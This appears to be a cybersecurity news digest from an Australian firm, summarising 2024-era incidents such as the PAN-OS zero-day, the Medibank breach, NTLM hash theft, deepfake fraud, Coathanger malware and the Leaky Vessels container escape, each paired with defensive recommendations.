AUSCSEC Pty Ltd (Australian Cyber Security).

State-Sponsored Hackers Exploit Zero-Day to Backdoor Palo Alto Networks Firewalls https://ino.to/4dj-PqO According to the cybersecurity firm, the vulnerability was identified in PAN-OS versions 10.2, 11.0, and 11.1. The company’s Panorama appliances, Cloud NGFW, and Prisma Access solutions are not impacted. The issue, Palo Alto Networks says, exists only if both the GlobalProtect gateway and the device telemetry configurations are enabled. The company says it is currently working on patches for the flaw, which will be included in PAN-OS versions 10.2.9-h1, 11.0.4-h1, and 11.1.2-h3. The security updates are expected to be released by the end of this week. In the meantime, Palo Alto Networks customers can go to Network > GlobalProtect > Gateways from the firewall’s web interface to check whether a GlobalProtect gateway has been configured. To verify whether device telemetry has been enabled, customers should go to Device > Setup > Telemetry.

CISA Issues Emergency Directive After Midnight Blizzard Microsoft Hits https://ino.to/ZLMlYCy Apply stringent security measures, including strong passwords, multifactor authentication (MFA), and prohibited sharing of unprotected sensitive information via unsecured channels.

Australian police link "over 11,000 cybercrime incidents" to Medibank breach https://ino.to/ek1Lz2X Key points: PII Breaches are stepping stones for Criminals: This incident highlights how a single data breach can be a goldmine for attackers. Stolen personal information like names, addresses, birthdates, and even medical records can be used for a variety of criminal activities. This includes: Identity Theft: Criminals can use stolen information to impersonate victims and open new accounts, take out loans or make fraudulent purchases. Targeted Phishing Attacks: With personal details, attackers can craft more believable phishing emails or calls, tricking victims into revealing even more sensitive information or clicking malicious links. Selling Data on the Dark Web: The stolen data itself can be sold on underground marketplaces for other criminals to exploit. Increased Workload for Law Enforcement: The large number of cybercrime incidents linked to the Medibank breach shows the strain such breaches put on law enforcement. It highlights the need for: Improved law enforcement capabilities: Victoria Police's request for better data storage and analysis tools reflects the challenges in handling the massive amount of data involved in cybercrime investigations. Collaboration between Law enforcement and Tech Companies: Effective investigations often require cooperation between law enforcement and tech companies to track down criminals and seize evidence stored in the cloud. Importance of Data Security: This incident serves as a stark reminder for organisations of the importance of strong data security practices. This includes: Limiting Data Collection: Businesses should only collect the personal information they absolutely need and dispose of it securely when it's no longer required. Strong Access Controls: Implementing robust access controls to prevent unauthorised access to sensitive data is crucial. Staying Updated on Threats: Organisations need to keep their systems and software up-to-date with the latest security patches to address vulnerabilities exploited by attackers. Overall, the Medibank breach exemplifies the cascading effects of a major data breach and underlines the importance of robust cybersecurity measures to protect personal information.

Hackers steal Windows NTLM authentication hashes in phishing attacks https://ino.to/gsgJMrC Some of the measures: Restricting guest access to SMB servers alone does not mitigate the TA577 attack, as it leverages automatic authentication to the external server that bypasses the need for guest access. Configure a firewall to block all outbound SMB connections (typically ports 445 and 139), stopping the sending of NTLM hashes. Implement emailing filtering that blocks messages containing zipped HTML files, as these can trigger connections to unsafe endpoints upon launch. Configure 'Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers' Windows group policy to prevent sending NTLM hashes. However, this could lead to authentication issues against legitimate servers. For organizations using Windows 11, Microsoft introduced an additional security feature for Windows 11 users to block NTLM-based attacks over SMBs, which would be an effective solution.

US cyber and law enforcement agencies warn of Phobos ransomware attacks https://ino.to/p2YZodn Indicators of Compromise can be found here: https://lnkd.in/g_iqBhcy.

US says China's Volt Typhoon is readying destructive cyberattacks https://ino.to/qSo2zZf This attack on critical infrastructure by China's Volt Typhoon group highlights the growing threat of cyberattacks on businesses of all sizes, including SMEs. Some key lessons for SMEs: 1. No Organisation is Immune: Don't assume your size protects you. Cybercriminals often target SMEs due to perceived weaker defences. 2. Prioritise Patching: Regularly update software and firmware to address vulnerabilities exploited by attackers. Focus on systems connected to the internet. 3. Implement MFA: Multi-factor authentication adds an extra layer of security beyond passwords, making it harder for attackers to gain access. 4. Enable Logging and Monitoring: Track user activity and system events to detect suspicious behaviour and potential intrusions. Store logs securely for analysis. 5. Stay Informed: Follow cybersecurity news and alerts from trusted sources to stay updated on emerging threats and mitigation strategies. Additional Recommendations: Conduct Security Assessments: Identify vulnerabilities in your systems and network. Develop a Security Plan: Have a documented plan for responding to cyberattacks. An Incident Response Plan (IRP) supports faster mitigation, reduced damage, Improved efficiency and coordination, enhanced preparedness, reduced resource fatigue, and other benefits Train Employees: Educate employees on cybersecurity best practices, including phishing awareness. Backup Data Regularly: Regularly back up critical data to minimise the impact of ransomware or other attacks. Consider Cyber Insurance: Investigate cyber insurance options to help manage financial risks. Remember: Cybersecurity is an ongoing process, not a one-time fix. By taking these steps, SMEs can significantly improve their defenses against cyberattacks and protect their business. Further Resources: US Cybersecurity and Infrastructure Security Agency (CISA): https://www.cisa.gov/ Australian Cyber Security Centre (ACSC): https://www.cyber.gov.au/

Deepfake Video Conference Convinces Employee To Send $25 Million To Scammers https://ino.to/N5zLqW4 This case highlights the concerning rise of deepfake technology in phishing scams, with potentially devastating consequences for organisations and individuals. Here's a breakdown of its implications for cybersecurity: Increased Risk of Spear-Phishing: Deepfakes provide a powerful tool for impersonation, bypassing initial trust barriers and making scams more believable. Traditional email-based phishing might now extend to video calls, further blurring the lines between genuine and fraudulent interactions. Challenges in Detection: The sophistication of deepfakes is evolving, making them harder to distinguish from real videos, especially under pressure or time constraints. Reliance on visual and auditory cues alone might not be sufficient for accurate detection, requiring more robust authentication methods. Financial and Reputational Losses: The Hong Kong case demonstrates the significant financial harm deepfake scams can inflict on organisations. Damage to brand reputation and potential legal repercussions add to the negative impact. Recommendations for Strengthening Cybersecurity: Multi-factor authentication: Implement additional verification steps beyond usernames and passwords, like OTPs or hardware tokens. Security awareness training: Educate employees about deepfakes, suspicious behaviour, and verification protocols for high-value transactions. Least privilege access: Limit user access to systems and data based on their specific roles and responsibilities. Collaboration platform security: Choose secure communication platforms with features like voice and video verification. Multi-level approvals: Establish mandatory multiple approvals for high-value transactions, especially involving external accounts. Confirmation protocols: Implement processes for verifying requests, even from seemingly familiar faces, through established communication channels. Continuous training: Update training programs to address the evolving deepfake threat and empower employees to question suspicious activity. Personal Awareness: Be sceptical of unexpected video calls, especially if requesting unusual actions or involving large sums of money. Verify requests through established communication channels and confirm details directly with trusted contacts. Report suspicious activity immediately to IT security or relevant authorities.

Chinese Coathanger malware hung out to dry by Dutch defense department https://ino.to/8RKNo1M This incident highlights several key cybersecurity concerns: 1. Targeted Attacks: This wasn't a random spray-and-pray attack. Chinese state-sponsored actors specifically targeted the Dutch Ministry of Defence using custom-built malware for Fortinet firewalls, exploiting a known vulnerability (CVE-2022-42475). This demonstrates the need for organisations to be vigilant about patching vulnerabilities and implementing layered security measures. 2. Advanced Malware: The Coathanger malware was designed to be stealthy and difficult to detect, even on fully patched devices. This emphasizes the importance of having advanced threat detection and response capabilities in place. 3. Persistent Access: The attackers aimed to establish persistent access within the network, allowing them to steal sensitive data and potentially launch further attacks. This underlines the need for robust segmentation and access control measures within networks. 4. International Attribution: Dutch authorities publicly attributed the attack to Chinese state-sponsored actors, which is a significant step in raising awareness and potentially deterring future attacks. 5. Sharing Threat Intelligence: By publishing indicators of compromise (IOCs) and detection methods, the Dutch authorities are helping other organisations protect themselves from similar attacks. This collaborative approach is crucial in combating cyber threats. Here are some key takeaways for cybersecurity professionals: Patch vulnerabilities promptly. Don't wait for attackers to exploit them. Implement layered security. Utilise various security tools and techniques to protect your network. Monitor your network activity closely. Look for suspicious behavior and investigate potential threats. Segment your network. This can limit the damage if attackers gain access to one part of the network. Stay informed about the latest threats. Share threat intelligence with others to improve collective defense. By understanding the implications of this incident and taking proactive measures, organisations can better protect themselves from cyberattacks like this one

Ivanti devices hit by a wave of exploits for latest security hole https://ino.to/4X8uEH7 Administrators are encouraged to review the second advisory from CISA here: https://lnkd.in/gBgFBCeM

Leaky Vessels flaws allow hackers to escape Docker, runc containers https://ino.to/ylDs99L In addition to applying the available security updates as soon as possible, here are some other preventative measures you can take to protect against container escape vulnerabilities like Leaky Vessels: 1. Minimise the attack surface: Use the principle of least privilege: Grant containers only the permissions they need to function. Avoid running containers with root privileges unless necessary. Scan container images for vulnerabilities before deployment. Implement network segmentation to isolate containers from each other and the host system. 2. Harden the container environment: Use security-focused container runtimes like gVisor or Kata Containers. Enable mandatory access control (MAC) to restrict file system access. Keep the container runtime and container images up-to-date. 3. Monitor and detect suspicious activity: Implement intrusion detection and prevention systems (IDS/IPS) for container environments. Monitor container logs for unusual activity. Use security information and event management (SIEM) tools to aggregate and analyze security data from across your infrastructure. 4. Stay informed: Subscribe to security advisories from container vendors and distributors. Follow industry best practices and security recommendations. Regularly assess your container security posture and identify potential vulnerabilities. 5. Implement additional security measures: Use secrets management tools to securely store and manage sensitive data within containers. Utilise vulnerability scanning tools for containers to identify and address potential weaknesses. Consider container sandboxing solutions to further isolate containers from the host system. By implementing these measures, you can significantly reduce the risk of container escape vulnerabilities being exploited in your environment.